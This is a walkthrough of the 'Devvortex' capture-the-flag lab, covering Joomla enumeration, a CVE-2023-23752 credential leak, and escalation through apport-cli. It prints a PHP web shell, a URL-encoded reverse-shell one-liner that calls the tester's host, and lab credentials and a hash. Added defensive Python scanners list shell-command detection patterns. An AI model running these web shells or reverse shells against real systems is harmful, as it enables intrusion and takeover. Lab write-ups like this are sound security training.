Devvortex

Target IP: 10.129.229.146
Challenge Description: N/A.


Reconnaissance

Performing a port scan using the command sudo nmap -sS 10.129.229.146 -p- returns the result shown above. According to the scan above, there are two TCP ports open on the target machine.

I performed an aggressive port scan against the target machine using the command sudo nmap -sV -A 10.129.229.146 -p 22,80 and obtained the result shown above. I notice the HTTP service redirects to http://devvortex.htb, so I will add this hostname to my /etc/hosts file. Time to perform a subdomain search using ffuf.

Using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154, I performed a subdomain search and identified the subdomain dev.devvortex.htb as shown above. Time to insert this new subdomain name inside my /etc/hosts file.

Now my /etc/hosts file contains the entry shown above. Time to perform enumeration.


Enumeration

Port 80: HTTP (dev.devvortex.htb)

While performing a directory search against this subdomain using the command gobuster dir -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt, I identified an interesting entry named /README.txt. Browsing to this page shows the information above. By the looks of it, the target machine is running the Joomla CMS. But which version is it? Time to find out.

    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://dev.devvortex.htb ...
                                                                                                                   
[+] FireWall Detector                                                                                                         
[++] Firewall not detected                                                                                                    
                                                                                                                              
[+] Detecting Joomla Version                                                                                                  
[++] Joomla 4.2.6                                                                                                             
                                                                                                                              
[+] Core Joomla Vulnerability                                                                                                 
[++] Target Joomla core is not vulnerable                                                                                     
                                                                                                                              
[+] Checking apache info/status files                                                                                         
[++] Readable info/status files are not found                                                                                 
                                                                                                                              
[+] admin finder                                                                                                              
[++] Admin page : http://dev.devvortex.htb/administrator/                                                                              
[+] Checking robots.txt existing                                                                                              
[++] robots.txt is found                                                                                                      
path : http://dev.devvortex.htb/robots.txt                                                                                                                                                                                                  
Interesting path found from robots.txt                                                                                        
http://dev.devvortex.htb/joomla/administrator/                                                                                
http://dev.devvortex.htb/administrator/                                                                                       
http://dev.devvortex.htb/api/                                                                                                 
http://dev.devvortex.htb/bin/                                                                                                 
http://dev.devvortex.htb/cache/                                                                                               
http://dev.devvortex.htb/cli/                                                                                                 
http://dev.devvortex.htb/components/                                                                                          
http://dev.devvortex.htb/includes/                                                                                            
http://dev.devvortex.htb/installation/                                                                                        
http://dev.devvortex.htb/language/                                                                                            
http://dev.devvortex.htb/layouts/                                                                                             
http://dev.devvortex.htb/libraries/                                                                                           
http://dev.devvortex.htb/logs/                                                                                                
http://dev.devvortex.htb/modules/                                                                                             
http://dev.devvortex.htb/plugins/                                                                                             
http://dev.devvortex.htb/tmp/                                                                                                 
                                                                                                                              
                                                                                                                              
[+] Finding common backup files name                                                                                          
[++] Backup files are not found                                                                                               
                                                                                                                              
[+] Finding common log files name                                                                                             
[++] error log is not found                                                                                                   
                                                                                                                              
[+] Checking sensitive config.php.x file                                                                                      
[++] Readable config files are not found                                                                                      
                                                                                                                              
                                                                                                                              
Your Report : reports/dev.devvortex.htb/

Using the tool joomscan and the command joomscan -u http://dev.devvortex.htb, I obtained the result shown above. The target machine is running Joomla 4.2.6, as shown above. This tool also identified interesting directories. Although the tool reports the Joomla core as not vulnerable for this version, I will need to search further.

And bingo! I searched for Joomla 4.2.6 vulnerability on Google and found the multiple results shown above. According to the results, this version suffers from an information disclosure vulnerability. The CVE identifier for this vulnerability is CVE-2023-23752, as shown above.

I also managed to find a verified exploit for this vulnerability at https://www.exploit-db.com/exploits/51334 using Exploit Database, as shown above. Time to make a copy of the exploit on my machine and run it against the target machine's web application. Since that exploit is written in Ruby, I will look for a Python exploit instead.

Searching GitHub for a working exploit for this vulnerability, I found the repository shown above. I made a copy of the exploit on my machine under the name exp.py. Time to test it :)


Exploitation

I ran the exploit using the command python3 exp.py. Then I chose mode 1, targeted the hostname http://dev.devvortex.htb, and got a hit, as shown above. This exploit successfully disclosed the credentials lewis:P4ntherg0t1n5r3c0n##.

From previous enumeration, I identified that the Joomla administrator page is at http://dev.devvortex.htb/administrator. Maybe I can use the credentials here? Time to find out.

And bingo! I successfully logged into the administrator panel using the credentials disclosed by the exploit, as shown above. Since the user lewis is an administrator on this CMS, I will need to find a vector to obtain a foothold on the target machine. This is doable by overwriting one of the template files with a web shell and using it to obtain a reverse shell connection.

I browsed to the System menu first. This is where the Site Templates are located, as shown above.

I notice the target machine is using the Cassiopeia template, as shown above. Time to overwrite one of the PHP files inside this template and insert my PHP web shell to obtain a reverse shell connection.

I decided to overwrite the error.php, as shown above.

I inserted the PHP code system($_GET['totally_not_a_sh3ll']); inside error.php, as shown above. Now I should be able to access my web shell. Time to test it.

And bingo! I browsed to http://dev.devvortex.htb/templates/cassiopeia/error.php?totally_not_a_sh3ll=id;whoami;ls and ran the commands id;whoami;ls and obtained the result shown above. My web shell is working successfully. Time to obtain a reverse shell connection now using this web shell.
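The tampering above (a command-execution call dropped into a template file) is what a defender would want to catch on disk. The following is an added example, not part of this write-up and not Joomla's own code: it scans a templates directory for PHP that hands a request superglobal to a shell or eval function, run here against a constructed temporary copy of a cassiopeia template with a clean index.php and a tampered error.php.

```python
# Added example (not from the write-up): flag Joomla template PHP files that
# feed request input from a superglobal into a shell/eval function, as in the
# tampered cassiopeia/error.php described above. Runs on a constructed tree.
import os
import re
import tempfile

# PHP functions that execute commands or evaluate code.
DANGEROUS_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "eval", "assert")
# Request-controlled superglobals reachable over HTTP.
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"
# Matches e.g. system($_GET['x']) or eval( $_POST["c"] ).
PATTERN = re.compile(
    r"\b(?P<func>" + "|".join(DANGEROUS_FUNCS) + r")\s*\(\s*"
    r"(?P<arg>" + SUPERGLOBALS + r"\s*\[[^\]]*\])", re.IGNORECASE)


def find_suspicious(source):
    """Return (line_number, function, argument) for each hit in PHP source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in PATTERN.finditer(line):
            hits.append((lineno, m.group("func").lower(), m.group("arg")))
    return hits


def scan_templates(root):
    """Walk a Joomla templates directory; map relative path -> hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_suspicious(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed samples: a clean template file and a tampered error.php.
CLEAN_PHP = "<?php\ndefined('_JEXEC') or die;\necho $this->title;\n"
TAMPERED_PHP = ("<?php\ndefined('_JEXEC') or die;\n"
                "system($_GET['totally_not_a_sh3ll']);\n")


def demo():
    """Build a templates/cassiopeia tree in a temp dir, scan it, return hits."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "cassiopeia")
        os.makedirs(tpl)
        with open(os.path.join(tpl, "index.php"), "w") as fh:
            fh.write(CLEAN_PHP)
        with open(os.path.join(tpl, "error.php"), "w") as fh:
            fh.write(TAMPERED_PHP)
        return scan_templates(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, func, arg in hits:
            print(f"{path}:{lineno}: {func}({arg})")
```

A pattern scan like this complements, rather than replaces, comparing template files against a known-good checksum baseline, since an attacker can obfuscate the call.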

I started a listener on my machine on port 8443. Then I sent the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.112%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the web shell and obtained a reverse shell connection, as shown above. Now I have a foothold on the target machine with a session as www-data :) I then upgraded my shell to a pty shell via Python using the command python -c 'import pty; pty.spawn("/bin/bash")'.
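The same activity also leaves a trace in the web server's access log, but the reverse-shell payload only stands out once the query string is percent-decoded. This is an added example of mine, not the author's: it decodes each request's parameters and flags command-like values, run over constructed combined-format log lines built from the two web-shell requests above (the timestamps are made up).

```python
# Added example (not from the write-up): decode the query string in web-server
# access-log lines and flag requests that drive a template PHP file with a
# shell command, as the web shell above does. The log lines are constructed.
import re
from urllib.parse import unquote_plus, urlsplit

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Decoded parameter values that look like a shell command or PHP one-liner.
CMD_RE = re.compile(
    r"(?:^|[;&|\s])(?:id|whoami|ls|cat|php|python\d?|bash|sh|nc|curl|wget)\b"
    r"|fsockopen\(|/bin/(?:ba)?sh|\$\(|`", re.IGNORECASE)


def decode_params(query):
    """Split a raw query on '&' only and percent-decode names and values.

    parse_qsl is avoided because older Pythons also split on ';', which would
    hide chained commands such as id;whoami;ls."""
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return params


def analyze(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # Joomla renders templates through index.php; a direct hit on a template
    # .php file with parameters is itself unusual.
    direct = parts.path.startswith("/templates/") and parts.path.endswith(".php")
    for name, value in decode_params(parts.query):
        if CMD_RE.search(value):
            return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
                    "param": name, "command": value, "direct_template": direct}
    return None


def scan_log(lines):
    """Run analyze() over every line and collect the findings."""
    return [f for f in map(analyze, lines) if f]


# Constructed sample log: one normal page view, then the two web-shell calls
# from the write-up (the second carries the URL-encoded reverse-shell payload).
SAMPLE_LOG = """\
10.10.14.112 - - [26/Nov/2023:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
10.10.14.112 - - [26/Nov/2023:10:01:02 +0000] "GET /templates/cassiopeia/error.php?totally_not_a_sh3ll=id;whoami;ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.112 - - [26/Nov/2023:10:03:15 +0000] "GET /templates/cassiopeia/error.php?totally_not_a_sh3ll=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.112%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']} -> {f['command']}")
```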


Privilege Escalation

From previous enumeration, I identified that a database server is running on the target machine. I decided to test the credentials I obtained via the exploit and got a session, as shown above. The command I used is mysql -h localhost -u lewis -p'P4ntherg0t1n5r3c0n##'. Then I ran the command show databases; and identified the database joomla. Maybe I can find interesting information inside this database? I ran use joomla; to select it.

Using the command select * from sd4fg_users;, I obtained the two entries shown above. Since one of the accounts on the target machine belongs to a user called logan, maybe cracking the password hash shown above can help? I saved the password hash $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 of the user logan on my machine in a file called hash to crack it using john.

To crack the hash, I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt. I successfully obtained the password tequieromucho belonging to the user logan, as shown above.

Using su logan and the new password tequieromucho, I was able to successfully switch to the user logan as shown above. I successfully escalated my privileges from www-data to logan horizontally.

Running sudo -l returns the entry (ALL : ALL) /usr/bin/apport-cli. The binary apport-cli is executable as root. I did a Google search for this binary and found multiple privilege escalation techniques, one being the vulnerability with the CVE id CVE-2023-1326.

Obtaining a root shell was pretty simple. I followed the instructions at https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00. GG. This challenge was a lot of fun and the privilege escalation was a joy.


Flags

The two flags are shown above.